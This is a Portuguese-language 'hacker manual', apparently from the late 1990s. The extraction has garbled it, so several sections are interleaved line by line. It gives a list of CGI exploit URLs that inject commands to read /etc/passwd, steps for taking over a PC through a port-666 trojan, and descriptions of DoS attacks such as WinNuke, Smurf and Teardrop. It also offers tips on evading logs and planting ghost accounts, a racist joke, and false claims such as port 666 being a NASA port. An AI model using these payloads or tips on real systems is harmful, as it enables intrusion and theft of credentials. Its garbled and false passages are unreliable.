Manual do Hacker completo - passo a passo ENDEREÇO IP.

ENTÃO PODEMOS EXECUTAR COMANDOS

REMOTOS COMO RSH, DESDE QUE DEDE QUE AQUELES
HOSTS "CONFIÁVEIS" ESTEJAM LISTADOS NO RHOSTS,
=====INVASÃO PELA PORTA 666=====
SEM PEDIR PASSWORD. OUTRA POSSIBILIDADE É LISTAR
NOMES DE HOSTS NO ARQUIVO /ETC/HOSTS.EQUIV.
MAS O QUE É ISSO?
NESTE CASO, QUALQUER USUÁRIO DAS MÁQUINAS
LISTADAS PODE TAMBÉM LOGAR-SE NO HOST LOCAL SEM
UMA PASSWORD.
É UMA PORTA QUE SÓ PODERIA SER USADA PELO
GOVERNO AMERICANO E NASA, TANTO QUE ELES
THREE-WAY HADSHAKE: QUANDO UM HOST ENVIA UMA
COMUNICAM-SE POR ESTA PORTA. BOM, PARA SE
MENSAGEM A UM OUTRO HOST ESTE PODE SER DIVIDIDO
CONECTAR POR ELA NÃO É NADA FÁCIL, MAS PRECISA DE
EM UM NÚMERO DE SEGMENTOS E REDICIONADO AO
ALGUNS AJUSTES, É MAIS UMA COISA PARA PEGAR
HOST DESTINO POR TCP. O IP SOMENTE SE
COISAS NA CASA DE UM AMIGO SEM ELE FICAR SABENDO.
ENCARREGADE ROTEÁ-LO. QUANDO UMA APLICAÇÃO EM
UM CLIENTE QUER ALCANÇAR A OUTRA EM UM SERVIDOR,
O QUE VOCÊ PRECISA:
DEVE CONHECER A O IP DA MÁQUINA-DESTINO E Ó
NÚMERO DA PORTA TCP DESIGNADO À APLICAÇÃO, E
VOCÊ PRECISA DE UM PROGRAMA CHAMADO AABOUT
DECIDIR ENTÃO A CONEXÃO DESTINO. (CONEXÃO-
(www.sites.uol.com.br/HACKERSBRASIL), E PEGUE ESTE
DESTINO=DIREÇÃO IP+PORTA TCP).
PROGRAMA. VOCÊ PRECISA DE UM PROGRAMA PARA
ACESSAR TELNET. PARA QUEM NÃO SABE ESTE
PARA ESTABELECER UMA CONEXÃO, O TCP UTILIZA UM
PROGRAMA FICA NO DIRETÓRIO WINDOWS. PRONTO? JÁ
PROCEDIMENTO DENOMINADO "3-WAY HANDSHAKE".
TENHO TUDO AGORA? AGORA É SÓ CHAMAR UM AMIGO
NESTE PROCESSO, 3 MENSAGENS (SYN, SYN/ACK y ACK)
PARA UMA CONVERSA PELO ICQ, OU PELO CHAT, ELE
SÃO REQUERIDAS PARA ESTABELECER A CONEXÃO.
TAMBÉM DEVE TER AS DUAS FERRAMENTAS. DEPOIS DE
ENTRE A INFORMAÇÃO INTERCAMBIADA ESTÁ A DIREÇÃO
CHAMÁ-LO, OS DOIS DEVEM EXECUTAR O AABOUT.
DE CADA MÁQUINA E O NÚMERO DE SEQUENCIA INICIAL
DEPOIS, É SÓ ABRIR O TELNET E NO HOST COLOCAR O IP
(#SI) QUE AMBAS UTILIZARÃO PARA ESTABELECER A
DINÂMICO DA VÍTIMA E SE CONECTAR A PORTA 666 E NO
COMINICAÇÃO. ESTES NÚMEROS SÃO EXCLUSIVOS PARA
LOGIN A PALAVRA GR!. O PONTO DE EXCLAMAÇÃO DEVE
A COMUNICAÇÃO ENTRE ESSAS DUAS MÁQUINAS, E SE
PERMANECER. PRONTO! AGORA VOCÊ ESTARÁ EM UM
BASEIAM NA HORA DO RELÓGIO INTERNO DO SISTEMA.
PROMPT! É SÓ DAR UM DIR, E VOCÊ TEM TOTAL
UMA VEZ ABERTA A CONEXÃO. AS DUAS MÁQUINAS JÁ
CONTROLE SOBRE O PC DO CARA! TANTO CONTROLE QUE
"AUTENTICADAS", ESTÃO PRONTAS PARA TROCAR DADOS.
PODE CHEGAR A DAR UM FORMAT C: , POR ISSO, SÓ FAÇA
ISSO COM SEUS AMIGOS.
=====ATAQUE POR MONITORAÇÃO=====
ATAQUES POR MONITORAÇÃO SÃO BASEADOS EM
=====SPOOFING=====
SOFTWARE DE MONITORAÇÃO DE REDE CONHECIDO
PARA QUE VOCÊ COMPREENDA ESTE TEXTO É
COMO SNIFFER, INSTALADO PELOS INVASORES. O
NECESSÁRIO QUE VOCÊ TENHA ALGUNS
SNIFFER GRAVA OS PRIMEIROS 128 BYTES DE CADA
CONHECIMENTOS SOBRE UNIX E PROTOCOLOS TCP/IP.
SESSÃO LOGIN, TELNET E FTP SESSION VISTA NAQUELE
SEGMENTO DE REDE LOCAL COMPROMETENDO TODO O
ANTES DE MAIS NADA, O SPOOFING NÃO É UM ATAQUE, E
TRÁFEGO DE/PARA QUALQUER MÁQUINA NAQUELE
SIM PARTE DE UM. LOGO, O SPOOFING É UMA ESPÉCIE DE
SEGMENTO, BEM COMO O TRÁFEGO QUE PASSAR POR
TÉCNICA DE ATAQUE, DO QUAL O HACKER PODE
AQUELE SEGMENTO. OS NOMES CAPTURADOS INCLUEM O
MASCARAR SEU ENDEREÇO IP OU DNS, POR EXEMPLO,
HOST DESTINO, O USERNAME E A PASSWORD. A
DIZENDO AO SISTEMA QUE ELE VAI ATACAR, QUE ELE É
INFORMAÇÃO É GRAVADA NUM ARQUIVO
CONFIÁVEL. ISSO OCORRE POR QUE AS COMUNICAÇÕES
POSTERIORMENTE RECUPERADO PELO INVASOR PARA
ENTRE COMPUTADORES NA INTERNET SE BASEIA NESTES
TER ACESSO A OUTRAS MÁQUINAS. EM MUITOS CASOS OS
ENDEREÇOS "CONFIÁVEIS" PARA TROCAREM
INVASORES OBTEM ACESSO INICIAL AOS SISTEMAS
INFORMAÇÕES. UMA MÁQUINA A PODE MANTER UMA
USANDO UMA DAS SEGUINTES TÉCNICAS: OBTEM O
COMUNICAÇÃO COM UMA MÁQUINA B SEM QUE SEJA
ARQUIVO DE PASSWORDS VIA FTP EM SISTEMAS
NECESSÁRIO VERIFICAR TODA HORA SE A INFORMAÇÃO É
IMPROPRIAMENTE CONFIGURADOS; OBTEM O ARQUIVO
AUTÊNTICA ENTRE ELAS. O HACKER, ENTÃO, PÕE UMA
DE PASSWORDS DE SISTEMAS RODANDO VERSÕES
ESPÉCIE DE DISFARCE EM SEU PC, DIZENDO PARA A
INSEGURAS DO NIS; OBTEM ACESSO AO SISTEMA DE
MÁQUINA A QUE ELE É A MÁQUINA B. ASSIM, A MÁQUINA A
ARQUIVOS LOCAIS VIA PONTOS EXPORTADOS PARA
VAI ACEITAR TODOS OS SEUS COMANDOS E, ENTÃO, O
MONTAGEM COM NFS, SEM RESTRIÇÕES; USAM UM NOME
CARA PODE FAZER TUDO O QUE QUISER NELA. OS TIPOS
DE LOGIN E PASSWORD CAPTURADA POR UM SNIFFER
MAIS COMUNS DE SPOOFING SÃO: IP-SPOOFING, DNS-
RODANDO EM OUTRO SISTEMA. UMA VEZ NO SISTEMA, OS
SPOOFING, WEB-SPOOFING, E-MAIL-SPOOFING ENTRE
INVASORES OBTEM PRIVILÉGIOS DE ROOT EXPLORANDO
OUTROS.
VULNERABILIDADES CONHECIDAS, TAÇ COMO RDISTSUN
SPARC INTEGER DIVISION E ARQUIVOS UTMP POSSÍVEIS
COMO FOI MENCIONADO ANTERIORMENTE, NO SPOOFING
DE ESCRITA POR TODO MUNDO OU USANDO UMA
O INVASOR TOMA A IDENTIDADE DE HOST CONFIÁVEL. EM
PASSWORD DE ROOT CAPTURADA. ELES ENTÃO INSTALAM
UMA REDE UNIX PODEMOS CONFIGURAR HOSTS
O SOFTWARE SNIFFER, REGISTRANDO A INFORMAÇÃO
CONFIÁVEIS. SE UMA MÁQUINA UNIX CRIA EM SEU
CAPTURADA NUM ARQUIVO INVISÍVEL.
DIRETORIO/HOME UM ARQUIVO CHAMADO RHOSTS COM
OS NOMES DE HOSTS, LOGO QUALQUER USUÁRIO QUE
ADICIONALMENTE, ELES INSTALAM CAVALOS DE TRÓIA EM
TENHA O USER ID QUE VOCÊ COLOCOU NESTE ARQUIVO
SUBSTITUIÇÃO E UMA OU MAIS DENTRE OS SEGUINTES
PODE LOGAR-SE NA SUA CONTA USANDO O RLOGIN.
ARQUIVOS DE SISTEMA, PARA OCULTAR SUA PRESENÇA:
O RLOGIN É UM PROTOCOLO BASEADO EM CLIENTE
/BIN/LOGIN
/SERVIDOR SIMPLES, QUE USA O TCP COMO PROTOCOLO
DE COMUNICAÇÃO. O RLOGIN PERMITE AO USUÁRIO
/USR/ETC/IN.TELNETD
LOGAR-SE REMOTAMENTE DE UM HOST AO OUTRO. SE A
MÁQUINA ALVO CONFIAR NA MÁQUINA DESTE USUÁRIO, O
/USR/KVM/PS
RLOGIN PERMITIRÁ A CONVENIÊNCIA DE NÃO PEDIR
PASSWORD. ELA SOMENTE IRÁ AUTETICAR O CLIENTE VIA
/USR/UCB/NETSTAT

ENTENDA O BARRAMENTO DO MICRO
ISA- O BARRAMENTO SURGIU COM OS XT´S, O ISA
ORIGINAIS ERAM DE 8 BITS E RODAVAM A 4,77 MHZ. COM O
ADVENTO DOS AT, VAIO O ISA DE 16 BITS QUE OPERAVAM
A 8 MHZ., UTILIZADOS ATÉ HOJE.
POR EXEMPLO, AS FAX-MODEM POSSUEM BARRAMENTO
ISA DE 8 BITS.
OS BARRAMENTOS UTILIZADOS ATUALMENTE SÃO O ISA,
VESA E PCI, ESSES DOIS ÚLTIMOS SÃO O QUE SE CHAMA
DE LOCAL BUS.
SÃO CAHMADOS DE LOCAL BUS POR FUNCIONAREM EM
CONEXÃO DIRETA COM A CPU.
VESA- HOJE MUITO POPULAR, NÃO CHEGA A CONSTITUIR
UM BARRAMENTO NOVO, ELE É BASICAMENTE UM ISA
ALTERADO, E É UM BARRAMENTO RÁPIDO, DE 32 BITS E
FREQÜÊNCIA DE FUNCIONAMENTO DE 33 MHZ. A
VELOCIDADE DE TRANSMISSÃO É DE 130MBITS/S.
=====ROUBANDO SENHAS DE SITES=====
ESTAS SENHAS PERMITEM QUE VOCÊ ENTRE EM SITES
RESTRITOS QUE NECESSITAM DE SENHA PARA ENTRAR.
(NÃO FUNCIONA EM TODOS)
phf http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0acat%20/etc/passwd
php.cgi http://xxx.xxx.xxx/cgi-bin/php.cgi?/etc/passwd test-cgi
http://xxx.xxx.xxx/cgi-bin/test-cgi?/etc/* query
http://xxx.xxx.xxx/cgi-bin/query?%0a/bin/cat%20/etc/passwd
faxsurvey http://xxx.xxx.xxx/cgi-bin/faxsurvey?/bin/cat
%20/etc/passwd htmlscript http://xxx.xxx.xxx/cgi-
bin/htmlscript?../../../../etc/passwd webdist.cgi
http://xxx.xxx.xxx/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
nph-test-cgi http://xxx.xxx.xxx/cgi-bin/nph-test-cgi?/etc/* echo
http://xxx.xxx.xxx/cgi-bin/echo?%0Acat%20/etc/passwd view-
source http://xxx.xxx.xxx/cgi-bin/view-
source?../../../../../etc/passwd pfdisplay http://xxx.xxx.xxx/cgi-
bin/pfdispaly.cgi?/../../../../etc/passwd campas
http://xxx.xxx.xxx/cgi-bin/campas?%0acat%0a/etc/passwd%0a
wrap http://xxx.xxx.xxx/cgi-bin/wrap?/../../../../../etc whatever
http://xxx.xxx.xxx/cgi-bin/handler/whatever;cat /etc/passwd|?
data=Download xenolith http://xxx.xxx.xxx/cgi-
bin/handler/xenolith;cat /etc/passwd/| ?data=Download
Substitua o xxx.xxx.xxx pelo endereço do site
DoS
PARA COMEÇAR A ESCREVER SOBRE DoS, NADA MELHOR
DO QUE EXPLICAR O QUE É ISSO. O LAMMER VEM E DIZ: "
EU SEI! É UM SISTEMA OPERACIONAU SUPER LEGAL
CRIADU PELU BIU GAYTIS, PAI DU MERCADU DI
SOFITIWARE! I EU SEI TUDU DELI!" NÃO!!!!! O HACKING NÃO
SE LIMITA A MERDAS COMO DOS LAMMAH! NA VERDADE
NEM SEI SE CHEGA A INCLUIR TAMANHA BOSTA. ASSIM,
DOS E DoS SÃO COISAS DIFERENTES. ENQUANTO DOS
QUER DIZER "DISK OPERATING SYSTEM", DoS QUER DIZER
"DENIAL OF SERVICE". DoS É UM ATAQUE MUITO ÚTIL, E
COMO O PRÓPRIO NOME DIZ, NEGA UM DETERMINADO
TIPO DE SERVIÇO AOS USUÁRIOS, ISTO É, IMPEDE QUE
ACESSEM UM DETEMINADO SERVOÇO DO HOST.
PODE-SE TER COMO ALVO DE UM DoS DESDE O MAIS
BAIXO LAYERDO TCP/IP ATÉ STACK ATÉ O LAYER DE
APLICAÇÃO, TRAVANDO O IRC DO CARA, POR EXEMPLO.
COMO VEREMOS AQUI, NÃO EXISTE UM ATAQUE DE DoS, E
SIM VÁRIOS TIPOS DE ATAQUES QUE PODEM SER
CONSIDERADOS COMO DoS, CADA UM DELES ATACANDO
UMA PARTE DO TCP/IP E DOS SEUS SUBPROTOCOLOS.
A UTILIDADE? VÁRIAS! O PRÓPRIO MAIL BOMB PODE SER
CLASSIFICADO COMO UM ATAQUE DE DoS, POIS ELE
ENCHE A CAIXA DO MANÉ DE MENSAGENS IMPDINDO QUE
ELE CHEQUE OU TALVEZ ATÉ TRAVANDO O POP3. OUTRO
EXEMPLO É O WINNUKE, QUE ATACA UM DRIVER DO
TCP/IP E FAZ COISAS QUE VARIAM DE CAIR A CONEXÃO
DO CARA ATÉ RESETAR O MICRO DO SUJEITO. ASSIM, O
DoS SURGE COMO UM NOVO CAMPO A SER EXPLORADO,
INVESTIGANDO NÃO SOMENTE FUROS DE SEGURANÇA
MAS SIM FRAQUEZAS NA MANEIRA COM QUE OS
PROTOCOLOS E OS SISTEMAS OPERACIONAIS LIDAM COM
DETERMINADOS TIPOS E QUANTIDADES DE DADOS. SE
VOCÊ AINDA NÃO TOMOU UMA NOÇÃO CLARA DO QUE
SERIA DoS, OS ATAQUES ABAIXO IRÃO AJUDÁ-LO A
ENTENDER.
WINNUKE
OS AFETADOS: WIN 95 (INCLUINDO OSR2), E WINDOWS NT
4.0.
QUANDO O TITIO BILL GATE$ CRIOU WINDOWS 95 E CIA,
PENSOU EM COMO SERIA A IMPLANTAÇÃO DO
COMPARTILHAMENTO DE ARQUIVOS, DADA ATRAVÉS DE
UM PROTOCOLO CHAMADO NETBIOS. QUERIA QUE FOSSE
ALGO PRÁTICO, CONSTANTE E SEM
DIFICULDADES PARA O USUÁRIO FINAL. POR ISSO,
RESERVOU AO NETBIOS A PORTA TCP/IP 139 E DEIXOU
ELE ABERTA EM TODOS OS SISTEMAS, COMO UM DEFALT.
ACONTECE QUE ACABARAM DESCOBRINDO QUE ERA
POSSÍVEL FAZER UM ATAQUE DE DoS BEM INTERESSANTE
COM ESSA PORTA 139. ESTE ATAQUE CONSISTE EM
MANDAR UMA MENSAGEM OOB (OUT OF BAND) PARA ESSA
PORTA E COMO O RWINDOWS NÃO SABE LIDAR COM ESSE
TIPO DE MENSAGEM, OCORRE UM ERRO NO TCP/IP DO
SEU RWINDOWS, FAZENDO APARECER PORTANTO, A
FAMOSA TELA AZUL COM AS MENSAGENS DE ERRO DE
DRIVER. EMBORA SEJA MAIS COMUM WINNUKAR UMA
PESSOA PELA PORTA 139, ISSO PODE SER FEITO POR
OUTRAS PORTAS RELACIONADAS AO NETBIOS (COMO 135
E 137), DESDE QUE ESTEJAM "ESCUTANDO".
LAND
OS AFETADOS- WIN95 (INCLUINDO OSR2), WIN NT 4.0 E
BSDI 2.1 E OUTROS
ENTRE OUTROS, O LINUX NÃO É AFETADO A PARTIR DO
KERNEL 2.0.30
ESSE ATAQUE USA UM MECANISMO INTERESSANTE,
PORÉM NÃO CAUSA DANOS CONSIDERÁVEIS, SÓ
CAUSANDO UMA CERTA LENTIDÃO POR ALGUNS
INSTANTES. É O SEGUINTE: VOCÊ MANDA VÁRIOS
PACOTES DE TCP/IP COM A FLAG SYN, SPOOFADOS COM
O IP DO PRÓPRIO ALVO. A FLAG SYN É A FLAG DO TCP/IP
RESPNSÁVEL POR INICIAR UMA CONEXÃO TCP/IP,
CONHECIDA COMO TRHEE WAY HANDSHAKING. ASSIM, AO
RECEBER UMA FLAG SYN, O TCP/IP RESPONDE O CLIENTE
IMEDIATAMENTE COM UM PACOTE COM AS FLAGS SYN E
ACK. O QUE O LAND FAZ É O SEGUINTE: COMO AS SYN
REQUESTS ESTÃO SPOOFADAS COM O IP DO PRÓPRIO
ALVO, ESSE ALVO ACABA MANDANDO AS SYN ACK´S PARA
ELE MESMO, CAUSANDO UMA LENTIDÃO ENORME NO
SISTEMA E CHEGANDO ATÉ A TRAVÁ-LO EM ALGUMAS
VARIAÇÕES. SIMPLES E EFICIENTE.
TEARDROP
AS AFETADOS- WIN 95 (INCLUINDO OSR2), WIN NT E LINUX
ESSE ATAQUE TAMBÉM É MUITO FAMOSO. ELE EXPLORA
UM BUG PRESENTE NO LAYER IP (RELACIONADO À
FRAGMENTAÇÃO DE DATAGRAMAS IP) DO TCP/IP STACK
DOS DIFERENTES OS´S CITADOS ACIMA. QUANDO A VÍTIMA
RECEBE DETERMINADOS DADOS, SEU SISTEMA PODE
CONGELAR REPENTINAMENTE SUA CONEXÃO CAI E NO
CASO DE SISTEMAS WINDOWS PODE ATÉ SER QUE
APAREÇA A FAMOSA E TEMIDA TELA AZUL, ACUSNDO UM
ERRO. ENTRETANTO, ESSE BUG NÃO CAUSA GRAVES
DANOS E UM SIMPLES REBOOT IRÁ NORMALIZAR TUDO.
VOCÊ ENCONTRARÁ MAIORES DETALHES NA BOA E VELHA
ROOTSHELL (HTTP://WWW.ROOTSHELL.COM). É SÓ DAR
UM SEARCH.
SSPING/JOLT
OS AFETADOS- WIN 95 (INCLUINDO OSR2), WIN NT 4.0 E
ANTIGAS VERSÕES DE MAC’OS.
ESSE EXPLOITS DESENTERRA O VELHO PROBLEMA DOS
SISTEMAS WINDOWS COM O PROTOCOLO ICMP, E MAIS
ESPECIFICAMENTE COM A FUNÇÃO PING. O QUE O SSPING
FAZ É QUE ELE CRIA PACOTES DE DADOS ICMP MUITO
GRANDES (MAIS QUE O PERMITIDO), OS FRAGMENTA EM
VÁRIAS PARTES (PARA PODER ENVIAR) E OS ENVIA DE
UMA VEZ SÓ PARA O ALVO. QUANDO O ALVO PEGA ESSES
FRAGMENTOS E TENTA REMONTAR OS PACOTES
ORIGINAIS ELE TRAVA E É PRECISO REINICIÁ-LO.
BONK/BOINK
OS AFETADOS- WIN 95 (INCLUINDO OSR2) E WIN NT 4.0.
ESSES DOIS SÃO NA VERDADE VARIAÇÕES DO
CONHECIDO TEARDROP. O BONK SERIA UM TEARDROP
QUE TRAVA MESMO MÁQUINAS PATCHEADAS. JÁ O BOINK
É UMA VERSÃO MAIS AVANÇADA DO BONK E PERMITE QUE
PORTAS UDP SEJAM USADAS COMO ALVO. ESSES FATOS
SE BASEIAM NO FATO DE QUE O WINDOWS PODE TRAVAR
SE RECEBER MUITOS PACOTES UDP CORROMPIDOS.
ASSIM O PROGRAMA MANDA VÁRIOS DATAGRAMAS IP
FRAGMENTADOS E NO COMPUTADOR ALVO SÃO
REMONTADOS EM PACOTES UDP INVÁLIDOS ATRAVÉS DO
"OVERLAPPING BUG", TAMBÉM MUITO EXPLORADO NO
TEARDROP.
SMURF
OS AFETADOS- TODOS. ISSO MESMO! VOCÊ OUVIU BEM! T-
O-D-O-S!
AGORA CHEGOU A HORA DE FALAR SOBRE UM DOS
ATAQUES MAIS EFICIENTES E LOUCOS. O SMURF! A
SIMPLICIDADE DESSE ATAQUE CHEGA A IMPRESSIONAR
QUANDO SE OBSERVA OS DANOS QUE PODEM SER
CAUSADOS. ENTRE TODOS OS DoS DESCRITOS ATÉ AQUI,
ESSE É O PRIMEIRO QUE NÃO ENVOLVE APENAS DOIS
COMPUTADORES: O INVASOR E A VÍTIMA, MAIS SIM
CENTENAS, ATÉ MILHARES DE HOSTS, CONTRA APENAS
UM SÓ!! DEVASTADOR!!
O QUE O SMURF FAZ É QUE ELE MANDA UM BROADCAST
DE PACOTES ICMP (MANDA PARA VÁRIOS ENDEREÇOS,
CONTIDOS EM UMA LISTA A SER CRIADA POR VOCÊ) SÓ
QUE COM O ENDEREÇO DE ORIGEM SPOOFADO COM O IP
DA VÍTIMA. ASSIM, TODOS OS COMPUTADORES QUE
FORAM PINGADOS IRÃO RESPONDER UNICAMENTE PARA
ESSE COMPUTADOR VÍTIMA.
POR EXEMPLO: SE VOCÊ MANDA UM PING PRA 1000
COMPUTADORES E ESSE PING TEM COMO IP DE ORIGEM O
IP DA VÍTIMA, ESSE COITADO IRÁ RECEBER NADA MAIS
NADA MENOS DO QUE 1000 PACOTES ICMP DE
RESPOSTA!!!!! QUASE AO MESMO TEMPO!!! ISSO
SIMPLESMENTE DETONA COM O MICRO DO CARA E TRAVA
ELE TOTALMENTE, TENDO QUE SER REINICIADO.
FINGER DoS
OS QUE ESTÃO RODANDO FINGER UNPATCHEADO
PARA QUEM NÃO SABE, FINGER É UM SERVIÇO MUITO
PRESENTE EM SISTEMA MULTIUSUÁRIO (ESPECIALMENTE
SISTEMAS UNIX) QUE MOSTRA QUEM ESTÁ LOGADO NO
SISTEMA, SEUS LOGINS, TERMINAIS QUE ESTÃO
UTILIZANDO, TEMPO QUE ESTÃO LOGADOS, ETC. É BEM
ÚTIL NA OBTENÇÃO DE INFORMAÇÃO PARA UMA
HACKEADA, MAS NÃO É DISSO QUE ESTAMOS FALANDO
AGORA.
O FINGER OPERA NA PORTA 79 E FUNCIONA NO ESQUEMA
REQUEST-ANSWER. ASSIM, VOCÊ FAZ UM FINGER
REQUEST PARA O FINGERD DE UM HOST E ESTE HOST TE
RESPONDE, DE ACORDO COM A REQUEST QUE FOI FEITA.
SE VOCÊ QUISER SABER QUEM ESTÁ LOGADO NO
SISTEMA VOCÊ DÁ O COMANDO FINGER@SISTEMA
.COM.BR E LOGO VERÁ UMA LISTA DE USUÁRIOS
LOGADOS.
SE QUISER SABER INFORMAÇÕES SOBRE UM
DETERMINADO USUÁRIO VOCÊ DÁ O COMANDO FINGER
USUÁRIO@SISTEMA.COM.BR.
O ATAQUE CONSITE EM VÁRIOS REQUESTS ENVIADOS
RAPIDAMENTE PARA O ALVO.
USUÁRIO@@@@@@@@@@SISTEMA.COM.BR.
CADA @ QUE VOCÊ COLOCOU REPRESENTA UM REQUEST
E LOGO ASSIM, O COMPUTADOR DA VÍTIMA SOFRERÁ UM
FLOOD DE REQUESTS, O QUE DIMINUIRÁ O DESEMPENHO.
(NUNCA SOUBE DE NENHUM TRAVAMENTO OCASIONADO
POR ESTE ATAQUE).
ENTÃO É SEGUINTE MANO! SE VOCÊ TEM NEURÔNIOS O
SUFICIENTE EM SEU CÉREBRO PERCEBEU QUE O WIN 95 E
NT SÃO AS VÍTIMAS DE QUASE TODOS OS ATAQUES
LISTADOS AQUI. E NÃO PENSE QUE ESSES SÃO TODOS,
POIS EXISTEM MUITOS OUTROS QUE ESTÃO SENDO
CRIADOS NO MOMENTO. DoS É AGORA, COMO JÁ
MENCIONEI ANTES, UM CAMPO A SER EXPLORADO PELOS
HACKERS.
SNIFFER
O SEGUINTE DOCUMENTO VISA AUXILIAR
ADMINISTRADORES A COMPREENDER PROBLEMAS
RELACIONADOS COM SNIFFING E AS POSSÍVEIS
SOLUÇÕES. A AÇÃO DOS SNIFFERS É ATUALMENTE UM
DOS PRINCIPAIS PROBLEMAS DE SEGURANÇA.
O QUE É O SNIFFER E COMO ELE FUNCIONA?
COMPUTADORES EM REDE COMPARTILHAM CANAIS DE
COMUNICAÇÃO. ISSO É OBVIAMENTE MUITO MAIS BARATO
DO QUE PASSAR UM CABO EM CADA PAR DE
COMPUTADORES PARA FAZER AS CONEXÕES. NESTES
CANAIS COMPARTILHADOS, COMPUTADORES PODEM
RECEBER INFORMAÇÕES ENVIADAS A OUTROS
COMPUTADORES. A AÇÃO DE CAPTURAR INFORMAÇÕES
DESTINADAS A OUTROS COMPUTADORES É CHAMADA
SNIFFING.
O PADRÃO ETHERNET ENVIA UM PACOTE PARA TODAS AS
MÁQUINAS EM UM MESMO SEGMENTO. O CABEÇALHO DO
PACOTE CONTÉM O ENDEREÇO DA MÁQUINA DESTINO.
SUPÕEM-SE QUE SOMENTE A MÁQUINA QUE TENHA O
ENDEREÇO CONTIDO NO PACOTE RECEBA-O. DIZ-SE QUE
UM COMPUTADOR ESTÁ EM MODO PROMÍSTUO QUANDO O
MESMO CAPTURA TODOS OS PACOTES,
INDEPENDENTEMENTE DE SEREM OU NÃO DESTINADOS A
ELE.
EM UM AMBIENTE DE REDE NORMAL, OS NOMES E AS
SENHAS DOS USUÁRIOS SÃO PASSADAS ATRAVÉS DA
REDE EM CLARO, OU SEJA, TEXTO NÃO CRIPTOGRAFADO.
NÃO É DIFÍCIL, PORTANTO, UM INTRUSO UTILIZANDO UMA
MÁQUINA COM INTERFACE DE REDE EM MODO
PROMÍSTUO, OBTER QUALQUER SENHA, INCLUSIVE A DO
ROOT, UTILIZANDO UM SNIFFER.
DICAS DE ÉTICA HACKER
DESCOBRIU ALGO NOVO, OLHE.
NÃO APAGUE. PENSE NO QUE SERIA MELHOR: TER
ACESSO A PROVEDOR OU DETONÁ-LO?
NÃO MODIFIQUE NADA, A MENOS QUE QUER QUE SAIBAM
QUE ESTEVE LÁ.
NUNCA TENTE UM SU ROOT DIRETO. ISSO FICA LOGADO.
NÃO FIQUE USANDO TELNET OU PEGANDO E-MAIL
USANDO ACESSO DOS OUTROS.
NUNCA SUBESTIME UM SYSOP.
ESCOLHA HORAS ENTRE 0:30 E 6:00.
UMA VEZ LÁ DENTRO TENTE DOMINAR O LUGAR, MAS COM
CAUTELA.
NÃO COFIE EM NINGUÉM.
SE PEGAR A SENHA DO ROOT DE UM PROVEDOR DE
ACESSO E NÃO SABE O QUE FAZER, MATE-SE!
NÃO TESTE VÍRUS NO PRÓPRIO HD.
É BOM PREPARAR MUITO BEM UM A ESTRATÉGIA ANTES
DE ATACAR.
USE OS COMPUTADORES DE SUA UNIVERSIDADE (É MAIS
SEGURO)
NÃO FIQUE DISTRIBUINDO INFORMAÇÕES SOBRE O QUE
VOCÊ PEGOU.
NÃO TENHA PENA DE NINGUÉM.
VOCÊ USA MS-DOS, LINUX, WINDOWS OU UNIX? NÃO
CONTE A NINGUÉM...
NÃO CRIE LAÇOS AFETIVOS COM A VÍTIMA.
APRENDA O MÁXIMO QUE PUDER COM QUEM SABE MAIS!
NÃO SE META A BESTA DIRETO!
MAIS DICAS
CONHEÇA A FUNDO OS SOSTEMAS OPERACIONAIS COMO
O WINDOWS, LINUX E UNIX, WINDOWS NT. COM ELES É
QUE VOCÊ IRÁ ENTENDER COMO QUEBRAR A SEGURANÇA
OU ENTÃO COMO FUNCIONA A SEGURANÇA, É MAIS
DIFÍCIL, MAIS NÃO IMPOSSÍVEL.
APRENDA UMA LINGUAGEM DE PROGRAMAÇÃO COMO
VISUAL BASIC OU C. VOCÊ ESCREVENDO PEQUENOS
PROGRAMINHAS PODE DEIXAR UM PROGRAMA RODANDO
EM PARALELO PARA DESCOBRIR SENHAS DE ACESSO.
APRENDA A USAR O COMANDO TELNET DO UNIX PARA SE
LOGAR EM MÁQUINAS REMOTAMENTE E COPIAR AQUELE
PROGRAMA OCULTO QUE FALTA PARA VOCÊ ENTRAR NOO
SISTEMA OU ENTÃO CADASTRAR UM USUÁRIO FANTASMA
PARA ENTRAR NO SITEMA.
APRENDA COMO FUNCIONAM AS REDES E QUAIS OS TIPOS
DE REDES QUE EXISTEM. HOJE EM DIA, A MAIORIA DOS
COMPUTADORES ESTÃO INTERLIGADOS E VOCÊ
CONHECENDO A ARQUITETURA E PROTOCOLOS USADOS
FACILITA BASTANTE O ACESSO.
APRENDA O PROTOCOLO TCP/IP, QUE É USADO HOJE EM
DIA NA INTERNET. ISSO SE VOCÊ QUISER SER UM HACKER
DA NET.
DIAL UP
DEVIDO A UMA ENORME QUANTIDADE DE BUGS E UMA
CAPACIDADE DE PROTEÇÃO QUE PERMITE QUE
QUALQUER PESSOA INVADA UM MICRO QUE UTILIZE A
REDE DIAL UP, COM UMA CONEXÃO PPP, O WINDOWS É
UM DOS MAIORES MOTIVOS DE PIADAS ENTRE OS
PORTUGUESES, NEGROS E O RUBINHO BARRICHELO.
MESMO QUE VOCÊ NÃO ESTEJA UTILIZANDO O
COMPARTILHAMENTO DE ARQUIVOS, QUALQUER PESSOA
PODE INVADIR SEU COMPUTADOR SE VOCÊ ESTIVER
FAZENDO ESTE TIPO DE CONEXÃO.
PARA ESTA "RECEITA DE BOLO" FUNCIONAR, VOCÊ TEM
QUE ESTAR USANDO A REDE DIAL UP E UMA CONEXÃO
PPP. ANTES DE TUDO VERIFIQUE SE VOCÊ POSSUI OS
DRIVERS CLIENTES DA MICROSOFT. CASO NÃO ESTEJA,
INSTALE-OS ATRAVÉS DO PAINEL DE CONTROLE NO ÍCONE
REDE. VERIFIQUE TAMBÉM, SE O COMPARTILHAMENTO DE
ARQUIVOS E IMPRESSORAS ESTÁ INSTALADO.
CONFIGURAR ESTAS OPÇÕES É SIMPLES. VÁ AO PAINEL
DE CONTROLE E ABRA REDE. VERIFIQUE AS
PROPRIEDADES DO TCP/IP. ALPI VOCÊ ENCONTRARÁ A
OPÇÃO PARA ATIVAR A RESOLUÇÃO WINS. NO CASO DE
VOCÊ NÃO CONHECER NENHUM SERVIDOR WINS,
204.118.34.6 COMO PRIMÁRIO E 204.118.34.11 COMO
SECUNDÁRIO. ESSES SERVIDORES SÃO SO USA E
GRATUÍTOS. CASO QUEIRA OUTROS ENDEREÇOS, UTILIZE
UM DOS MECANISMOS DE BUSCA DA INTERNET. PARA
CONFIGURAR O LMHOSTS VOCÊ PRECISA CRIAR UM
ARQUIVO TEXTO SIMPLES, COM O NOME DE LMHOSTS.
NESSE ARQUIVO É ONDE FICARÃO OS ENDEREÇOS DE IP
